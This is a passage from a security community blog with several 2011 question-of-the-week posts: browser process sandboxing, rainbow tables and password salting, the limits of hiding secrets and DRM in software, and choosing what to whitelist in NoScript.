Now, this also helps solve the security problem to some extent. Those sub-processes cannot alter each other’s memory easily at all, so there’s not much for them to exploit. In order to get anything done, they have to use IPC – interprocess communication, to talk to the master process and ask for certain things to happen. So now the master process can do some filtering based on a policy of who should be able to access what. Child processes are then denied access to things they can’t have, by the master process.

But, can’t sub processes just ask the operating system directly? Well, not on Windows for certain. When the master process creates the child process, it also asks Windows for a new security “level” if you like (token is the technical term) and creates the process in that level, which is highly restricted. So the child process will actually be denied certain things by the operating system unless it needs them, which is harder to do on a single process where parts of it do need unrestricted access.

In defence to the Windows engineers, this functionality (security tokens) has been part of the Windows API for a while; it’s just developers haven’t really used it. Also, it applies to threads too, although there remains a problem with access to the process’s memory.

Great! I can switch to Chrome and all will be well!

Hold up a second… yes, this is an excellent concept and hopefully other browser writers will start looking at integrating OS security into their browsers too. However, any solution like this will also under certain conditions be circumventable, it’s just a matter of finding a scenario. Also, chrome and any other browser cannot defend you from yourself – some basic rules still apply. They are, briefly, do not open dodgy content and do keep your system/antivirus/firewall up to date.

Right, so what’s the best browser?

I can’t answer that, nor will I attempt to try. All browser manufacturers know that “security” bugs happen and all of them release fixes, as do third parties. A discussion on which has the best architecture is not a simple one – we’ve outlined the theory here, but how it is implemented will really determine whether it works – the devil is in the detail, as they say.

So that concludes our high level discussion of the various security issues with browsers, plugins and drive by downloads. However, I would really like to stress there is a whole other area of security which you might broadly call “web application” security, which concerns in part what the browser allows to happen, but also encompasses servers and databases and many other things. We’ve covered a small corner of the various problems today; hopefully some of our resident web people will over time cover some of the interesting things that happen in building complex web sites. Here is a list of all the questions here tagged web-browser.

QotW #9: What are Rainbow Tables and how are they used?

2011-09-09 by roryalsop. 0 comments

This week’s question, asked by @AviD, turned out to have subtle implications that even experienced security professionals may not have been aware of.

A quick bit of background:

With all the furore about passwords, most companies and individuals know they should have strong passwords in place, and many use system enforced password complexity rules (eg 8 characters, with at least 1 number and 1 special character) but how could a company actually audit password strength.

John the Ripper was a pretty good tool for this – it would brute force or use a dictionary attack on password hashes, and if it broke them quickly they were weak. If they lasted longer they were stronger (broadly speaking)

So far so good, but what if you are a security professional emulating an attacker to assess controls? You could run the brute forcer for a while, but this isn’t what an attacker will do – maths has provided much faster ways to get passwords:

Hash Tables and Rainbow Tables

Hash Tables are exactly as the name sounds – tables of hashes generated from every possible password in the space you want, for example a table of all DES crypt hashes for unsalted alphanumeric passwords 8 characters or less, along with the password. If you manage to get hold of the password hashes from the target you simply match them with the hashes in this table, and if the passwords are in the table you win – the password is there (excluding the relatively small possibility of hash collisions – which for most security purposes is irrelevant as you can still use the wrong password if its hash matches the correct one). The main problem with Hash tables is that they get very big very quickly, which means you need a lot of storage space, and an efficient table lookup over this space.

Which is where Rainbow Tables come in. @Crunge‘s answer provides excellent detail in relatively simple language to describe the combination of hashing function, reduction function and the mechanism by which chains of these can lead to an efficient way to search for passwords that are longer or more complex than those that lend themselves well to a hash table.

In fact @Crunge’s conclusion is:

Hash tables are good for common passwords, Rainbow Tables are good for tough passwords. The best approach would be to recover as many passwords as possible using hash tables and/or conventional cracking with a dictionary of the top N passwords. For those that remain, use Rainbow Tables.

@Mark Davidson points us in the direction of resources. You can either generate the rainbow tables yourself using an application like RainbowCrack or you can download them from sources like The Shmoo GroupFree Rainbow Tables project website, Ophcrackproject and many other places depending on what type of hashes you need tables for.

Now from a defence perspective, what do you need to know? 

Two things:

Longer passwords are still stronger against attack, but be aware that if they are too long then users may not be able to remember them. (Correct Horse Battery Staple!)

Salt and Pepper@Rory McCune describes salt and pepper in this answer:

A simple and effective defence that most password hashing functions provide now is salting – the addition of a per user “salt” value stored in the database along with the hashed password. It isn’t intended to be secret but is used to slow down the brute force process and to make rainbow tables impractical to use.  Another add-on is what is called a “pepper” value. This was just another random string but was the same for all users and stored with the application code as opposed to in the database. the theory here is that in some circumstances the database may be compromised but the application code is not, and in those cases this could improve the security. It does, however, introduce problems if there are multiple applications using the same password database.

Storing secrets in software

2011-09-06 by ninefingers. 0 comments

This question comes up on Stack Overflow and IT Security relatively regularly, and goes along one of these lines:

  1. I have a symmetric encryption key I would like to store in my application so attackers can’t find it.
  2. I have an asymmetric encryption key I would like to store in my application so attackers can’t find it.
  3. I would like to store authentication details of some kind in my application so attackers can’t find them.
  4. I have developed an algorithm. How do I make it so attackers can never find it.
  5. I am selling commercial music. I need to make it so The Nasty Pirates can’t decode it.

Firstly, a review of what cryptography is at heart: encryption and decryption are all about sending data over untrusted networks or storing data in untrusted places such that only the intended recipient can read that information. This gives you confidentiality; cryptography as a whole also aims to provide integrity checks through signatures and message digests. Confusingly, cryptography is often confused with access control, in which it so often plays a part. Cryptography ceases to be able to protect you when you decide to put the key and the encrypted data together – at this point, the data has reached its destination, the trusted place. The expectation that cryptography can protect data once it is decrypted is similar to the expectation that a locked door will protect your house if you leave the key under the mat. The act of accessing the key and decrypting the data (and even encrypting it) is a weak link in the chain: it assumes the system you’re performing these actions on guarantees your confidentiality and integrity – it assumes that system is trusted. Reading the argument presented here, our resident cryptographer provided the following explanation:  “Encryption does not create confidentiality, it just concentrates confidentiality into the key. Presumably, it is easier to keep confidential a small key of fixed size, and the key uniform structure allows for the key confidentiality to be measured. Yet you have to start confidentiality at something. Once the key is known, confidentiality has left.”

All of the above questions are really forms of the same thing: how do I on an untrusted system safely decode some encrypted data without interception? In other words, you’re now asking for cryptography to guarantee the security of that information even after you’ve decrypted it. This isn’t possible. The problem then becomes one of how do you ensure that the system in question will maintain confidentiality and integrity for you.

The answer, then, is to create a system which acts as the recipient such that data can be decoded in it and never needs to be transferred outside of it. I’ll call it the black box. The rest of this blog post will be about looking for the black box setup.

  1. We will begin with the idea we want to write a program that stores something securely whilst preventing the user from accessing that information. So the first place people want to do this is in their source code. Which is fine, except source code can be disassembled. Yes, there are ways to make this more difficult but it is not possible to prevent. The same goes for hiding or stashing files around the system, since a cursory analysis with the right tools will tell you exactly where to look. I should add that disassembly prevention probably makes your software less stable and/or portable.
  2. The next option is to coerce the system into helping you hide your information. In any form, this will essentially look like a rootkit. This is dangerous: you may well have your application categorised as malware, for starters, but more importantly at this stage it is very easy to introduce extra vulnerability into the system you have just hooked. You could also crash your customer’s system, which is “not cool” whichever way you look at it. Finally, whilst rootkits are difficult to remove, taking a live listing of files and then an offline one is not. Rootkits can be found and their installation prevented. In fact, a cunning reverse engineer might replace your rootkit with their own equivalent, stealing the information you send it. Handy.
  3. Stage 3 is one for the slashdot home page: the operating system vendor is complicit in helping you. Unless you are a music giant I suspect this probably is not an option for you. A complicit operating system is harder to circumvent, but entirely possible. All you need is access to ring 0 (for people not familiar with the term, ring 0 is the mode where the processor will not stop you lifting any restrictions placed upon memory or code. You can ignore read only page checks, rewrite chunks of kernel memory, whatever you want to do). Depending on the system, this might be difficult to achieve, but it certainly is not impossible. Another route to this stage is to compromise the boot process. You can pass the OS the correct validation codes if it checks anything. Etc. Clearly, this stage is difficult to pull off and requires time/effort, but it can be done.
  4. So, OS security not enough? Hardware then. At this stage you actually have a real black box (or chip) somewhere on the computer. Of course, if the OS has responses sent to it, see stages 1-3. So now your black box needs to talk to all your other hardware, like your monitor or speaker system. Oh and they need to be intercept-proof too – maybe they can’t be trusted either and are really decoding the data straight back to the hard disk. This might sound far fetched, but High-bandwidth Digital Content Protection (wikipedia) aims to provide exactly this kind of protection.

The move/counter-move sequence carries on – so what is to stop a hardware engineer taking your box apart? Self-destructing hardware? Ok, how do you prevent the fact that you’ll display it on a monitor, sending light-waves and electronic signals out?

What does this mean for software on the PC?

  1. You cannot store passwords, encryption keys etc in your code, or anywhere on the system. The only way around that is to allow for user input and aim to prevent interception, which could in itself be difficult.
  2. License keys do not work either, for the same reason.
  3. Nor does obfuscated code. It has to be decrypted to execute, at some point.

However, there is a case where hardware complicit defences are perfectly possible and may well be encouraged, where the hardware and software combination come together. There are many scenarios in which this happens, the most obvious being the mobile phone. A mobile phone is, relatively speaking, hard to take apart and put back together again whole (unless you’re a mobile phone engineer) so it is possible to have hardware-based security work reasonably effectively. Smart cards with on-board cryptographic function again ensure the keys are exceptionally hard to steal. In the case of smart cards, the boundary problem still exists in terms of transferring the decrypted data back to the untrusted system, but on a mobile phone-like device it would be entirely feasible not to route that information through the OS itself and instead play it directly on the screen, isolating those buffers from the “untrusted” sections of the OS. However, let’s leave that idea here. Trusted platforms is a blog post for another day.

Is there a case for devices capable of such secure display? Absolutely. Want to securely read data on a financial transaction, or have a trusted communication channel with your bank? Upping the bar like this definitely helps protect against malware and other interception threats. However, the most common use case appears to be “how do I defend my asset in an untrusted environment in order to enforce my desired price model?” Which brings me full circle – that is not the problem set cryptography solves.

When people say secure, they often mean “impossible for bad guy, possible for me”. That is almost never the case. Clearly, looking at the above, the number of people skilled enough to counter 3 is actually pretty small. You will, therefore, achieve part of this aim: “hard for bad guy, easyish for me”. When people say secure, they also frequently mean technical security measures. Security is more than just technical security – that’s why we have policies, community, law, education, awareness etc. Going as far as points 2/3 reduces the number of people capable of subverting your protection system to the point where legal action is feasible.

However, I think we still have a narrow definition of security in the first place. If you are talking about delivering content or software, the level of issues a customer is likely to come up against increases exponentially as you move from 1 through to point 4. Does your customer really want to be told that you do not support Windows 8 yet? Or that they cannot use their favourite media player for your content? Or that they need to upgrade their BigMediaCorpSatelliteTVBox because you altered the algorithms? Or that they’ve been locked out of that Abba Specials subscription channel they paid for because of a hardware fault, or… Security here is not just about protecting your content, it is about protecting your business. Will the cost of securing the content using any of 1-4 will make up for the potential revenue you could have made if everyone brought the copy legally? Or will the number of legitimate sales simply go down as consumers react to all those technical barriers shattering their plug-and-play expectation? I do not have any numbers on that one, but I am willing to bet the net result of adding this extra “security” is a loss.

Security needs to be appropriate to the risk of the situation presented, having been fully evaluated from all angles. The general consensus is that DRM is an excessive protection measure given the risks involved – indeed, a very simple solution is to make software/music/whatever at the right price point and value such that the vast majority of users buy it, and allow for the fact that some people will pirate/steal/make unauthorised use of it. In certain situations, providing a value add around the product can make the difference (some companies selling open source software generate their entire revenue using this model), and even persuade users of illegal copies to buy a licence in order to gain access to these services (e.g. support, upgrades).

 

QotW #8: how to determine what to whitelist with NoScript?

2011-09-02 by ninefingers. 2 comments

Our question of the week this week was asked by Iszi, who wanted to know how exactly we should determine what to trust when employing NoScript. In the question itself Iszi raises some valid points: how does somebody know, other than by trial and error, whether scripts from a given site or third party site are trustworthy? How does a user determine which parts of the javascript are responsible for which bits of functionality? How do we do this without exposing ourselves to the risks of such scripts.

Richard Gadsden suggests one way to approach a solution is for each site to declare what Javascript it directly controls. He notes that such a mechanism could trivially be subverted if the responding page lists any and all javascript as “owned” by the site in question.

Such resource-based mechanisms have been tried and implemented before, albeit for a different problem domain (preventing XSS attacks). Cross-Origin Resource Sharing (W3C, Wikipedia) attempts to do just that by vetting incoming third party requests. However, like HTML-based lists, it does not work well when the trusted end users are “everyone”, i.e. a public web service.

Zuly Gonzalez discusses a potential solution her startup has been working on – running scripts on a disposable vm. Zuly makes some good points – even with a whitelisted domain, you cannot necessarily trust each and every script that is added to the domain; moreover, after you have made your trust decision, a simple whitelist is not enough without re-vetting the script.

Zuly’s company – if you’re interested, check out her answer – runs scripts on a disposable virtual machine rather than on your computer. Disclaimer: we haven’t tested it, but the premise sounds good.

Clearly, however, such a solution is not available to everyone. Karrax suggested that the best option might be to install plugins such as McAfee SiteAdvisor to help inform users as to what domains they should be trusting. He notes that the NoScript team are beginning to integrate such functionality into the user interface of NoScript itself. This is a feature I did not know I had, so I tried it. According to the trial page, at the time of writing the service is experimental, but all of the linked to sites provide a lot of information about the domain name and whether to trust it.

This is an area with no single solution yet, and these various solutions are in continuous development. Let’s see what the future holds.